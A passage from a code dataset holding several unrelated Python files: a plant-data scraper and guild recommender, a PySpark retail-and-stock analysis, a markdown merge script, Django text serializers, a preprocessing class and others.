True\r\n                plants = plants.append(plant, ignore_index=True)\r\n        return plants\r\n\r\n    # TODO: implement function to search garden.org \r\n\r\n    def get_all_native_plants(self, new=False):\r\n        \"\"\"Download all native plants from USDA plant database with garden.org \r\n        data\"\"\"\r\n        if new:\r\n            plants = pd.DataFrame()\r\n        else:\r\n            plants = pd.read_csv('all_native_plants.csv') \r\n        options = Options()\r\n        options.headless = True\r\n        for i in range(74200,93000,1000):\r\n            print(f'\\n{i} / 93000')\r\n            self.driver.get(f'{self.usda_url}?limit=1000&offset={i}')\r\n            WebDriverWait(self.driver, 30).until(EC.presence_of_element_located(\r\n                (By.ID, 'rawdata-tab'))).click()\r\n            data_list = WebDriverWait(self.driver, 30).until(\r\n                EC.presence_of_element_located((By.CLASS_NAME, 'data')))\r\n            data_list = eval(data_list.text.replace('null', 'None'))['data']\r\n            for j in range(len(data_list)):\r\n                if j % 10 == 1:\r\n                    plants.to_csv('all_native_plants.csv', index=False)\r\n                    self.driver.quit()\r\n                    self.driver = Firefox(options=options)\r\n                print('.', end='', flush=True)\r\n                plant = {a:None for a in (self.categorical_attributes\r\n                                          + self.boolean_attributes\r\n                                          + self.numeric_attributes)}\r\n                data = data_list[j]\r\n                is_native = (('L48 (N)' in data['Native_Status']) or \r\n                             ('L48 (N?)' in data['Native_Status']))\r\n                in_df = (plants[['Genus','Species']] == ({k:v for k,v in \r\n                    data.items() if k in {'Genus','Species'}})).all(axis=1).any()\r\n                if is_native and not in_df:\r\n                    # columns to add: states, coppice, growth (clumping, \r\n                    # running, dispersive, etc.), active growth period?, \r\n                    # foliage porosity summer?, growth form?, known allelopath?,\r\n                    # fertility requirement, height, temperature_minimum_f\r\n                    # maybe to add from pfaf: edible and medicinal ratings,\r\n                    plant['Genus'] = data['Genus']\r\n                    plant['Species'] = data['Species']\r\n                    plant['Coarse Soil'] = data['Adapted_to_Coarse_Textured_Soils']=='Yes'\r\n                    plant['Medium Soil'] = data['Adapted_to_Medium_Textured_Soils']=='Yes'\r\n                    plant['Fine Soil'] = data['Adapted_to_Fine_Textured_Soils']=='Yes' \r\n                    self.driver.get(f'https://garden.org/plants/search/text/?q='\r\n                                    f'{plant[\"Genus\"]}+{plant[\"Species\"]}')\r\n                    results = self.get_results()\r\n                    plant['Varieties'] = results[f'{plant[\"Genus\"]} '\r\n                                                 f'{plant[\"Species\"]}']\r\n                    try: \r\n
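# skip this plant if it has no variety page or the info table cannot be found\r\n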
self.driver.get(plant['Varieties'][0])\r\n                        table = self.driver.find_element_by_xpath('//caption['\r\n                            'contains(text(), \"General Plant Information\")]/../'\r\n                            'tbody')\r\n                    except:\r\n                        continue\r\n                    rows = table.find_elements_by_xpath('.//tr')\r\n                    for row in rows:\r\n                        field,values = row.find_elements_by_xpath('.//td')\r\n                        field = field.text[:-1]\r\n                        values = values.text.split('\\n')\r\n                        if (field in self.categorical_attributes \r\n                                + self.numeric_attributes):\r\n                            plant[field] = values[0]\r\n                        else:\r\n                            for v in values:\r\n                                if f'{field}_{v}' in self.boolean_attributes:\r\n                                    plant[f'{field}_{v}'] = True \r\n                                elif v in self.boolean_attributes:\r\n                                    plant[v] = True\r\n                    plants = plants.append(plant, ignore_index=True)\r\n        self.driver.quit()\r\n\r\n\r\n\"\"\"\r\nconsiderations to implement:\r\nnumber of layers/plants (2-7)\r\nroot structures\r\nshade tolerances (shade tolerant short plants under sun loving tall plants)\r\ncombine root crops with vigorous plants that need thinning and won't mind the\r\ndisturbance\r\nalways include ground cover, nitrogen fixers, and mulchers\r\ndefine function for each patch\r\nuse heights of pfaf canopy trees to set height range for all canopy trees. \r\n\"\"\"\r\n\r\nclass GuildRecommender:\r\n    \"\"\"Recommends a group of native plants to be planted together in a guild.\r\n\r\n    num_layers: int, default=None\r\n        Number of layers to include in the guild. Can range from 2-7. If None, a\r\n        random number of layers will be chosen.\r\n\r\n    zone: int, default=7\r\n        USDA hardiness zone of the intended site. Can range from 1-10.\r\n\r\n    water: {'In Water', 'Wet', 'Wet Mesic', 'Mesic', 'Dry Mesic', 'Dry'}, \r\n        default='Mesic'\r\n        The moisture of the soil at the site.\r\n\r\n    ph: float, default=6.5\r\n        The pH of the soil at the site.\r\n    \r\n    sun: string, default='Full Sun'\r\n        How much sun is available at the site.\r\n\r\n    soil_texture: string, default='medium'\r\n        Values can be {'coarse', 'medium', 'fine'}, or from the \r\n        Soil Texture Triangle, {'sand', 'coarse_sand', 'fine_sand', \r\n        'loamy_coarse_sand', 'loamy_fine_sand', 'loamy_very_fine_sand', \r\n        'very_fine_sand', 'loamy_sand', 'silt', 'sandy_clay_loam', \r\n        'very_fine_sandy_loam', 'silty_clay_loam', 'silt_loam', 'loam', \r\n        'fine_sandy_loam', 'sandy_loam', 'coarse_sandy_loam', 'clay_loam', \r\n        'sandy_clay', 'silty_clay', 'clay'}.\r\n\r\n    include_trees: boolean, default=True\r\n        Whether or not trees can be considered when creating guilds.\r\n\r\n    edible_only: boolean, default=False\r\n        Whether only edible plants can be considered when creating guilds.\r\n\r\n    perennial_only: boolean, default=True\r\n        Whether only perennial plants will be considered when creating guilds.\r\n    \"\"\"\r\n\r\n    def __init__(self, num_layers=None, zone=7, water='Mesic', ph=6.5, \r\n                 sun='Full Sun', soil_texture='medium', include_trees=True, \r\n                 edible_only=False, perennial_only=True):\r\n        if num_layers is None:\r\n            self.num_layers = random.randint(2,7)\r\n        else:\r\n            self.num_layers = num_layers \r\n        self.zone = zone \r\n        self.water = water \r\n        if ph < 4.5:\r\n            self.ph = 'Extremely acid (3.5 – 4.4)'\r\n        elif ph < 5.1:\r\n            self.ph = 'Very strongly acid (4.5 – 5.0)'\r\n        elif ph < 5.6:\r\n            self.ph = 'Strongly acid (5.1 – 5.5)'\r\n        elif ph < 6.1:\r\n            self.ph = 'Moderately acid (5.6 – 6.0)'\r\n        elif ph < 6.6:\r\n            self.ph = 'Slightly acid (6.1 – 6.5)'\r\n        elif ph < 7.4:\r\n            self.ph = 'Neutral (6.6 – 7.3)'\r\n        elif ph < 7.9:\r\n            self.ph = 'Slightly alkaline (7.4 – 7.8)'\r\n        elif ph < 8.5:\r\n            self.ph = 'Moderately alkaline (7.9 – 8.4)'\r\n        else:\r\n            self.ph = 'Strongly alkaline (8.5 – 9.0)'\r\n        sun_list = ['Full Sun', 'Full Sun to Partial Shade',\r\n                    'Partial or Dappled Shade', 'Partial Shade to Full Shade', \r\n                    'Full Shade']\r\n        self.sun = 
sun_list[sun_list.index(sun):]\r\n        if soil_texture in {'coarse', 'sand', 'coarse_sand', 'fine_sand', \r\n                            'loamy_coarse_sand', 'loamy_fine_sand', \r\n                            'loamy_very_fine_sand', 'very_fine_sand', \r\n                            'loamy_sand'}:\r\n            self.soil_texture = 'Coarse Soil'\r\n        elif soil_texture in {'medium', 'silt', 'sandy_clay_loam', \r\n                              'very_fine_sandy_loam', 'silty_clay_loam', \r\n                              'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \r\n                              'coarse_sandy_loam', 'clay_loam'}:\r\n            self.soil_texture = 'Medium Soil'\r\n        elif soil_texture in {'fine', 'sandy_clay', 'silty_clay', 'clay'}:\r\n            self.soil_texture = 'Fine Soil'\r\n        self.habits = {'Herb/Forb', 'Shrub', 'Tree', 'Cactus/Succulent', \r\n                       'Grass/Grass-like', 'Fern', 'Vine'}\r\n        plants = pd.read_csv('all_native_plants.csv')\r\n        # a missing maximum recommended zone means no upper limit\r\n        plants = plants[(plants['Minimum cold hardiness']<=zone) & \r\n            (plants['Maximum recommended zone'].isna() | \r\n            (plants['Maximum recommended zone']>=zone))]\r\n        self.plants = pd.DataFrame()\r\n        for s in self.sun:\r\n            self.plants = self.plants.append(plants[plants[s]==True], \r\n                ignore_index=True)\r\n        self.plants = self.plants[self.plants[self.ph]==True]\r\n        self.plants = self.plants[self.plants[self.water]==True]\r\n        self.plants = self.plants[self.plants[self.soil_texture]==True]\r\n        if edible_only:\r\n            self.plants = self.plants[(self.plants['Seeds or Nuts']==True) | \r\n                (self.plants['Stem']==True) | (self.plants['Leaves']==True) | \r\n                (self.plants['Roots']==True) | (self.plants['Bark']==True) |\r\n                (self.plants['Sap']==True) | (self.plants['Fruit']==True) | \r\n                (self.plants['Flowers']==True)]\r\n        self.include_trees = include_trees\r\n        if not self.include_trees:\r\n            self.plants = self.plants[self.plants['Tree']!=True]\r\n        if perennial_only:\r\n            self.plants = self.plants[self.plants['Life cycle']=='Perennial']\r\n\r\n    def create_guild(self):\r\n        n_fixers = False\r\n        if self.include_trees:\r\n            all_layers = ['canopy', 'understory', 'shrub', 'herb', 'rhizome', \r\n                          'vine']\r\n            guild_layers = random.sample(all_layers, self.num_layers-1)\r\n        else:\r\n            all_layers = ['shrub', 'herb', 'rhizome', 'vine']\r\n            guild_layers = random.choices(all_layers, k=self.num_layers-1)\r\n        guild = pd.DataFrame()\r\n        canopy = None\r\n        understory = None\r\n        shrub = None\r\n        herb = None\r\n        groundcover = None \r\n        rhizome = None \r\n        vine = None \r\n        if 'canopy' in guild_layers:\r\n            canopies = self.plants[(self.plants['Tree']==True) & \r\n                (self.plants[self.sun[0]]==True)]\r\n            canopy = canopies.iloc[random.randint(0, len(canopies) - 1)]\r\n            guild = guild.append(canopy, ignore_index=True)\r\n        if 'understory' in guild_layers:\r\n            all_understories = self.plants[self.plants['Tree']==True]\r\n            understories = pd.DataFrame()\r\n            if 'canopy' in guild_layers:\r\n                for s in self.sun[1:]:\r\n                    understories = understories.append(all_understories[\r\n                        all_understories[s]==True], ignore_index=True) \r\n                canopy_height = canopy['Min Height']\r\n                if pd.notna(canopy_height):\r\n                    understories = understories[understories['Max Height'] < \r\n                        canopy_height]\r\n                else:\r\n                    understories = understories[understories['Max Height'] < 50]\r\n            else:\r\n                understories = all_understories[all_understories[self.sun[0]]==True]\r\n                understories = understories[understories['Max Height'] < 50]\r\n            understory = understories.iloc[random.randint(0, len(understories) - 1)]\r\n            guild = guild.append(understory, ignore_index=True)\r\n        canopy_present = 'canopy' in guild_layers\r\n        understory_present = 'understory' in guild_layers\r\n        if 'shrub' in guild_layers:\r\n            shrub = self.get_lower_plants(['Shrub'], canopy_present, understory_present) \r\n            guild = guild.append(shrub, ignore_index=True)\r\n        if 'herb' in guild_layers:\r\n            herb = self.get_lower_plants(['Herb/Forb', 
'Fern'], canopy_present, \r\n                understory_present)\r\n            guild = guild.append(herb, ignore_index=True)\r\n        if 'vine' in guild_layers:\r\n            vine = self.get_lower_plants(['Vine'], canopy_present, understory_present)\r\n            guild = guild.append(vine, ignore_index=True)\r\n        if 'rhizome' in guild_layers:\r\n            rhizome = self.get_lower_plants(['Rhizome', 'Tuber'], canopy_present, \r\n                understory_present)\r\n            guild = guild.append(rhizome, ignore_index=True)\r\n        n_fixers = (guild['Nitrogen fixer'] == True).any()\r\n        groundcover = self.get_lower_plants(['Groundcover'], canopy_present,\r\n            understory_present, n_fixers)\r\n        guild = guild.append(groundcover, ignore_index=True)\r\n        return guild\r\n    \r\n\r\n\r\n    def get_lower_plants(self, layers, canopy_present, understory_present, n_fix=True):\r\n        all_in_layer = pd.DataFrame()\r\n        for l in layers:\r\n            all_in_layer = all_in_layer.append(self.plants[self.plants[l]==True])\r\n        if not n_fix:\r\n            # the guild has no nitrogen fixer yet, so this layer must supply one\r\n            all_in_layer = all_in_layer[all_in_layer['Nitrogen fixer']==True]\r\n        selected = pd.DataFrame()\r\n        if canopy_present or understory_present:\r\n            for s in self.sun[1:]:\r\n                selected = selected.append(all_in_layer[all_in_layer[s]==True])\r\n        else:\r\n            selected = all_in_layer[all_in_layer[self.sun[0]]==True]\r\n        plant = selected.iloc[random.randint(0, len(selected) - 1)]\r\n        return plant\r\n\r\n# TODO: include 'Leaves Spring ephemeral' with herbs that grow later\r\n# TODO: add method to get columns and add option to filter by specified columns\r\n","sub_path":"plants/plants.py","file_name":"plants.py","file_ext":"py","file_size_in_byte":25465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"645696721","text":"import datetime\r\nimport json\r\nimport os\r\nimport boto3\r\n\r\nfrom pyspark.sql.functions import col\r\nfrom pyspark.sql import SparkSession, types\r\nfrom pyspark.sql.functions import to_date, avg\r\n\r\nIN_PATH = \"s3://mysparks/data/clean/statcan/\"\r\nOUT_PATH = \"s3://mysparks/OUTPUT-Folder/\"\r\n\r\n#IN_PATH = \"../data/clean/statcan/\"\r\n#OUT_PATH = \"../OUTPUT-Folder/\"\r\n\r\nSCHEMA_PATH = \"schema/statcan/\"\r\nretail_id = \"20100008\"\r\n\r\ns3_obj = boto3.client('s3')\r\ns3_retail_obj = s3_obj.get_object(Bucket='mysparks', Key=SCHEMA_PATH + retail_id + \".json\")\r\ns3_retail_data = s3_retail_obj['Body'].read().decode('utf-8')\r\nretail_schema = json.loads(s3_retail_data)\r\n\r\n# os.makedirs(OUT_PATH, exist_ok=True)\r\n#retail_schema = json.load(open(\"../schema/statcan/\" + retail_id + \".json\"))\r\n\r\nyahoo_schema = types.StructType([\r\n    types.StructField('REF_DATE', types.StringType()),\r\n    types.StructField('Open', types.DoubleType()),\r\n    types.StructField('High', types.DoubleType()),\r\n    types.StructField('Low', types.DoubleType()),\r\n    types.StructField('Close', types.DoubleType()),\r\n    types.StructField('Adj Close', types.DoubleType()),\r\n    types.StructField('Volume', types.DoubleType()),\r\n])\r\n\r\n\r\ndef main():\r\n    retail = spark.read.csv(IN_PATH + retail_id + '/*.csv',\r\n                            schema=types.StructType.fromJson(retail_schema))  # reading 'RetailTradeSales' csv Data\r\n    yahoo = spark.read.csv('s3://mysparks/data/YahooFinance.csv',\r\n                           schema=yahoo_schema)  # reading seasonal stock prices from 'YahooFinance' csv Data\r\n\r\n    # region Retail Trade Operations\r\n    # keep only rows where all three key columns are present\r\n    notnull = retail.filter(retail['REF_DATE'].isNotNull() & retail['GEO'].isNotNull() & retail['VALUE'].isNotNull()) \\\r\n        .withColumn('REF_DATE', to_date(retail['REF_DATE'], 'yyyy-MM'))\r\n\r\n    # filter out only \"Seasonally adjusted\" items, according to seasonal trading\r\n    seasonal = 
notnull.filter(notnull['Adjustments'] == 'Seasonally adjusted')\r\n\r\n # fetch retail data for the last 10 years between Jan 2010 and Oct 2020\r\n duration = seasonal.where(seasonal['REF_DATE'].between(datetime.datetime.strptime('2010-01-01', '%Y-%m-%d'),\r\n datetime.datetime.strptime('2020-10-01', '%Y-%m-%d')))\r\n\r\n # Taking only the provinces for case-1, consider entire Canada for Case-2\r\n province_df = duration.filter(~duration['GEO'].contains(',')).filter(duration['GEO'] != 'Canada')\r\n canada_df = duration.filter(duration['GEO'] == 'Canada')\r\n\r\n # Case1 --- To find avg seasonal(monthly) Retail Trade values for every Province in Canada\r\n # Case2 --- To find avg seasonal(monthly) Retail Trade values per industry for entire Canada\r\n retail1 = province_df.groupby('REF_DATE').pivot('GEO').agg(avg('VALUE')).orderBy('REF_DATE')\r\n retail2 = canada_df.groupby('REF_DATE').pivot('North American Industry Classification System (NAICS)').agg(\r\n avg('VALUE')).orderBy('REF_DATE')\r\n # In Case2, we can drop the 3 columns with null fields (dont contribute to Trade) ->\r\n # Cannabis stores, Department stores, Other general merchandise stores\r\n retail2 = retail2.drop('Cannabis stores [453993]', 'Department stores [4521]',\r\n 'Other general merchandise stores [4529]')\r\n\r\n # Retail_df output\r\n retail1.coalesce(1).write.csv(OUT_PATH + 'Retail1_output', header=True,\r\n mode='overwrite') # Province-wise Retail Trade values\r\n\r\n s3_obj.put_object(Body=retail2.schema.json(), Bucket='mysparks', Key=SCHEMA_PATH + \"retailsales_canada.json\")\r\n retail2.coalesce(1).write.csv(OUT_PATH + 'Retail2_output', header=True,\r\n mode='overwrite') # Industry-wise Retail Trade values for all provinces\r\n # endregion\r\n\r\n # region Yahoo Operations\r\n # Seasonal (monthly) calculations\r\n checkNull = yahoo.filter(yahoo['REF_DATE'].isNotNull()).withColumn('REF_DATE',\r\n to_date(yahoo['REF_DATE'], 'yyyy-MM'))\r\n\r\n # fetch yahoo stock data for the last 10 years between Jan 2010 and Oct 2020\r\n duration1 = checkNull.where(checkNull['REF_DATE'].between(datetime.datetime.strptime('2010-01-01', '%Y-%m-%d'),\r\n datetime.datetime.strptime('2020-10-01', '%Y-%m-%d')))\r\n\r\n # finding the avg monthly \"highest\" and \"lowest\" stock prices, and the Avg number of stocks traded\r\n yahoo1 = duration1.groupby('REF_DATE').agg(avg('Volume'), avg('High').alias('Avg Highest Stock'),\r\n avg('Low').alias('Avg Lowest Stock')).orderBy('REF_DATE')\r\n yahoo1 = yahoo1.withColumnRenamed('avg(Volume)', 'Avg Stock Traded')\r\n\r\n # Yahoo_df output\r\n yahoo1.coalesce(1).write.csv(OUT_PATH + 'Yahoo_output', header=True,\r\n mode='overwrite') # Yahoo_output -> REF_DATE, Avg Volume, Avg Highest Stock, Avg Lowest Stock\r\n # endregion\r\n\r\n # region Merging Retail Trades Sales with corresponding Stocks traded (Yahoo finance)\r\n TotalIndustryTrade = retail2.withColumn(\r\n 'TotalRetailTradePrice', sum(col(x) for x in retail2.columns[1:])) # to find the total Retail Trade values for all industries for that 'REF_DATE'\r\n final_res = TotalIndustryTrade.join(yahoo1, TotalIndustryTrade.REF_DATE == yahoo1.REF_DATE, \"inner\").drop(\r\n yahoo1['REF_DATE'])\r\n final_res1 = final_res.select('REF_DATE', 'TotalRetailTradePrice', 'Avg Stock Traded', 'Avg Highest Stock',\r\n 'Avg Lowest Stock').orderBy('REF_DATE')\r\n final_res1.coalesce(1).write.csv(OUT_PATH + 'Retail+YahooStock', header=True,\r\n mode='overwrite') # Retail+YahooStock --> REF_DATE, TotalRetailTradePrice, AvgStockTraded, AvgHighestStock, 
AvgLowestStock\r\n # endregion\r\n\r\n\r\nif __name__ == '__main__':\r\n spark = SparkSession.builder.appName('Retail+Yahoo Analysis').getOrCreate()\r\n spark.sparkContext.setLogLevel('WARN')\r\n sc = spark.sparkContext\r\n main()\r\n","sub_path":"src/5.RetailTradeSales+Yahoo.py","file_name":"5.RetailTradeSales+Yahoo.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"582969472","text":"edad = 0\n\nwhile edad < 18:\n edad = edad + 1\n print('Felicidades, tienes ' + str(edad))\n\nsalir = False\n\nwhile not salir:\n opcion = input('Ingrese entrada \\n')\n if opcion == 'adios':\n salir = True\n else:\n print(opcion)","sub_path":"Programacion 1/Python/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"13299526","text":"import sys\nimport os\nimport re\n\ndef readAllAPIFiles(path):\n file_list = os.listdir(path)\n temp = \"\"\n for single_file in file_list:\n current_path = path + \"/\" + single_file\n if(os.path.isdir(current_path)):\n temp += readAllAPIFiles(current_path)\n else:\n # check this file is data structure file or not\n if(re.match(r\".*((api|apis)\\.md)$\", single_file) != None):\n f = open(current_path, 'r')\n data_list = f.read().split(\"# Data Structures\")\n if(len(data_list) >=2):\n temp = temp + data_list[1]\n f.close()\n return temp\n\ndef readAllDataFiles(path):\n files_list = os.listdir(path)\n temp = \"\"\n for single_file in files_list:\n current_path = path + \"/\" + single_file\n if(os.path.isdir(current_path)):\n temp += readAllDataFiles(current_path)\n else:\n # check this file is data structure file or not\n if(re.match(r\".*_data_structures\\.md$\", single_file) != None):\n f = open(current_path, 'r')\n data_list = f.readlines()\n for index in range(len(data_list)):\n if(index < len(data_list)-2):\n match_object_line = re.match(r\"^##.*\\(object\\)\\n$\", data_list[index])\n match_object_form = re.search(r\"^\\s*(-|\\+).*\", data_list[index+2])\n if(match_object_line != None and match_object_form == None):\n data_list.pop(index+2)\n if(index < len(data_list)):\n temp += data_list[index]\n temp = temp.replace(\"# Data Structures\", \"\")\n f.close()\n return temp\n\ndata_dir_path = sys.argv[1]\nall_in_one_file = \"# Data Structures\" + readAllDataFiles(data_dir_path)\napi_dir_path = sys.argv[2]\nall_in_one_file = all_in_one_file + readAllAPIFiles(api_dir_path)\n\nf = open(\"temp.apib\", \"w\")\nf.write(all_in_one_file)\nf.close()\n","sub_path":"splitDataStructure.py","file_name":"splitDataStructure.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612433007","text":"cmds = {\n 'look': 'Look Around',\n 'north': 'Go North',\n 'south': 'Go South',\n 'east': 'Go East',\n 'west': 'Go West',\n }\n\nexit_abbrevs = {\n 'n': 'north',\n 's': 'south',\n 'e': 'east',\n 'w': 'west',\n }\n\n\nrooms = {\n 'town_square_1': {\n 'title': 'Town Square',\n 'description': \"\"\"\nYou are standing in the center of the town.\n\"\"\",\n 'exits': {\n 'east': 'dirt_road_1',\n 'west': 'town_narrow_1'\n }\n },\n 'dirt_road_1': {\n 'title': 'A Dirt Road',\n 'description': \"\"\"\nYou are standing on a dirt road off of town square.\"\"\",\n 'exits': {\n 'west': 'town_square_1'\n }\n },\n 'town_narrow_1': {\n 'title': 'A Narrow Alley',\n 'description': \"\"\"\nYou are in a 
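In 5.RetailTradeSales+Yahoo.py above, the row-wise total `sum(col(x) for x in retail2.columns[1:])` leans on Python's builtin `sum` starting from the integer 0, which only works because Spark's `Column` implements `__radd__`. An equivalent, more explicit fold over toy data (local session and invented columns, just to show the pattern):

```python
from functools import reduce
from operator import add

from pyspark.sql import SparkSession
from pyspark.sql.functions import col

spark = SparkSession.builder.master("local[1]").appName("rowwise-total").getOrCreate()
df = spark.createDataFrame([(1, 2, 3), (4, 5, 6)], ["a", "b", "c"])

# Same idea as sum(col(x) for x in retail2.columns[1:]) above, but reduce/add
# avoids the builtin sum's integer 0 seed and reads as an explicit fold.
total = reduce(add, [col(c) for c in df.columns])
df.withColumn("total", total).show()
spark.stop()
```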
narrow alley. It is very dark.\"\"\",\n 'exits': {\n 'east': 'town_square_1'\n }\n },\n }\n\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"16273611","text":"\n# Third Party\nfrom rest_framework import serializers\n\n# LingoApp\nfrom texts.models import *\n\n\n# NEED language\n\nclass ResourceSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = ResourceType\n\t\tfields = ('name', 'url')\n\nclass TextSerializer(serializers.ModelSerializer):\n\tresource = ResourceSerializer()\n\n\tclass Meta:\n\t\tmodel = Text\n\t\tfields = ('name', 'complexity_rank', 'resource',) \n\nclass PatternSerializer(serializers.ModelSerializer):\n\t__after_signs = (';', ':', '.', ',', '?', '!', '-',')')\n\t__before_signs = ('(', '\"')\n\n\tfull_text = TextSerializer()\n\n\tclass Meta: \n\t\tmodel = Pattern\n\t\tfields = ('full_text', 'pk')\n\n\tdef to_representation(self, instance):\n\t\tdata = super().to_representation(instance)\n\t\tdata['content'] = []\n\t\ttext = instance.getText()\n\t\tfor rawWord in text.split():\n\t\t\tbSignFlag = False\n\t\t\taSignFlag = False\n\t\t\tif rawWord[0] in self.__before_signs:\n\t\t\t\tbSignFlag = True\n\t\t\tif rawWord[-1] in self.__after_signs:\n\t\t\t\taSignFlag = True\n\t\t\t\t\n\t\t\tif bSignFlag and not aSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[0], 'is_sign' : True})\n\t\t\t\tdata['content'].append({'word' : rawWord[1:], 'is_sign' : False})\n\n\t\t\tif aSignFlag and not bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[:-1], 'is_sign' : False})\n\t\t\t\tdata['content'].append({'word' : rawWord[-1], 'is_sign' : True})\n\t\t\t\t\n\t\t\tif aSignFlag and bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[0], 'is_sign' : True})\n\t\t\t\tdata['content'].append({'word' : rawWord[1:-1], 'is_sign' : False})\n\t\t\t\tdata['content'].append({'word' : rawWord[-1], 'is_sign' : True})\n\n\t\t\tif not aSignFlag and not bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord, 'is_sign' : False})\n\n\t\treturn data\n\nclass RawPatternSerializer(PatternSerializer):\n\tdef to_representation(self, instance):\n\t\tdata = super().to_representation(instance)\n\t\tdata['content'] = instance.getText()\n\t\treturn data\n\nclass RandomPatternSerializer(PatternSerializer):\n\tdef to_representation(self, instance):\n\t\tpatternData = super().to_representation(instance)\n\t\tdata = {}\n\t\tdata['pk'] = patternData['pk']\n\t\treturn data","sub_path":"texts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291714570","text":"import pandas as pd\nimport numpy as np\nimport logging\nimport config\n\nclass CovertData(object):\n '''Given the path to a data file, build the feature mappings (a two-level dict).\n param: path to the data\n return: two-level dict\n '''\n def __init__(self, path):\n self.path = path\n self.dataset = self.read_data()\n self.features = self.map_features()\n self.cat_cols, self.numeric_cols = self.classify_features()\n\n\n def convert_unknown(self):\n data = self.dataset\n for i in range(data.shape[1]):\n data.iloc[:,i].fillna(config.nan, inplace=True)\n try:\n data.iloc[:,i] = data.iloc[:, i].astype(int)\n except (ValueError, TypeError):\n #print('non-numeric column %d'%i, end=' ')\n a = data.iloc[:,i].unique()\n mapping = dict(zip(a, range(1,len(a)+1)))\n data.iloc[:,i] = data.iloc[:,i].map(mapping)\n\n for unknown in config.unknown:\n if unknown in a:\n data.iloc[:,i] = 
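The token handling in PatternSerializer.to_representation above reduces to one rule: peel a leading sign off the front of each word and a trailing sign off the back. The same rule as a standalone function, handy for unit-testing outside Django (the function name is mine, and it is slightly hardened against single-character tokens):

```python
AFTER_SIGNS = (';', ':', '.', ',', '?', '!', '-', ')')
BEFORE_SIGNS = ('(', '"')

def split_token(raw):
    """Split a raw token into (word, is_sign) pairs, mirroring the serializer."""
    parts = []
    if raw and raw[0] in BEFORE_SIGNS:    # leading sign comes first
        parts.append((raw[0], True))
        raw = raw[1:]
    trailing = None
    if raw and raw[-1] in AFTER_SIGNS:    # trailing sign comes last
        trailing = (raw[-1], True)
        raw = raw[:-1]
    if raw:
        parts.append((raw, False))
    if trailing:
        parts.append(trailing)
    return parts

print(split_token('(hello,'))  # [('(', True), ('hello', False), (',', True)]
```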
data.iloc[:,i].astype(str)\n data.iloc[:,i] = data.iloc[:,i].replace(str(mapping['-9999']), np.nan)\n\n data.iloc[:,i] = data.iloc[:,i].astype(str)\n continue\n\n data.iloc[:,i] = data.iloc[:,i].astype(str)\n data.iloc[:,i] = data.iloc[:,i].replace('-9999', np.nan)\n return data\n\n def classify_features(self):\n data = self.dataset\n ignore_cols = []\n\n for i in range(data.shape[1]):\n for j in config.base_ignore_cols:\n if j in data.columns[i]:\n ignore_cols.append(data.columns[i])\n ignore_cols.extend(config.base_ignore_cols)\n\n single_value_cols = []\n for i in range(data.shape[1]):\n if data.iloc[:,i].nunique() in [0,1]:\n single_value_cols.append(data.columns[i])\n ignore_cols.extend(single_value_cols)\n\n partial_numeric_cols = []\n for i in range(data.shape[1]):\n for j in config.base_numeric_cols:\n if j in data.columns[i]:\n partial_numeric_cols.append(data.columns[i])\n partial_numeric_cols.extend(config.base_numeric_cols)\n\n cat_cols = []\n for i in range(data.shape[1]):\n if data.columns[i] in ignore_cols:\n continue\n if data.columns[i] in partial_numeric_cols:\n continue\n if data.columns[i] in config.base_label_cols:\n continue\n if data.iloc[:, i].nunique() < config.cat_numeric_threshold:\n cat_cols.append(data.columns[i])\n\n numeric_cols = []\n for i in data.columns:\n if i in ignore_cols:\n continue\n if i in config.base_label_cols:\n continue\n if i in cat_cols:\n continue\n numeric_cols.append(i)\n\n return cat_cols, numeric_cols\n\n def read_data(self):\n data = pd.read_csv(self.path, low_memory=False)\n logging.info('data size: %s' % data.shape)\n return data\n\n def map_features(self):\n data = self.dataset\n\n features = dict()\n for i in range(data.shape[1]):\n data.iloc[:, i].fillna('-9999', inplace=True)\n try:\n data.iloc[:,i] = data.iloc[:, i].astype(int)\n except ValueError:\n # LOGGING\n t = data.iloc[:,i].unique()\n t_map = dict(zip(t, range(1, len(t)+1)))\n features[data.columns[i]] = t_map\n return features\n","sub_path":"webapi/code/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"24923879","text":"import numpy as np\nimport scipy as sp\nimport scipy.stats\n\nclass asym_lh:\n ''' class with the likelihood for the asymetric cell labelling assays \n usable for minuit\n '''\n\n def __init__(self,data,times,ncell):\n ''' data = number of labeld cells\n times = time for labeling fraction\n ncell = number of cells \n '''\n self.data = np.round(data)\n self.datalen = np.size(data)\n self.times = times\n if np.size(ncell) != self.datalen:\n self.ncell = np.ones_like(data,dtype=np.int32)*ncell\n else:\n self.ncell = ncell\n\n def compute(self, Tc,r,GF,sigma_cell,sigma_sample):\n ''' compute log liklyhood for parameters given\n '''\n pmf = self.pmf_f(Tc,r,GF,sigma_cell,sigma_sample) \n pmf[np.abs(pmf) < 1e-300] = 1e-300 #fix nan in log\n return np.sum(-np.log( pmf) )\n #return np.sum(-np.log( self.pmf_f(Tc,r,GF,sigma_cell,sigma_sample) ) )\n\n\n def log_params(self, mu, sigma):\n \"\"\" A transformation of paramteres such that mu and sigma are the\n mean and variance of the log-normal distribution and not of\n the underlying normal distribution.\n \"\"\"\n s2 = np.log(1.0 + sigma**2/mu**2)\n m = np.log(mu) - 0.5 * s2\n s = np.sqrt(s2)\n return m, s\n\n def pdf_LN(self, X, mu, sigma):\n ''' 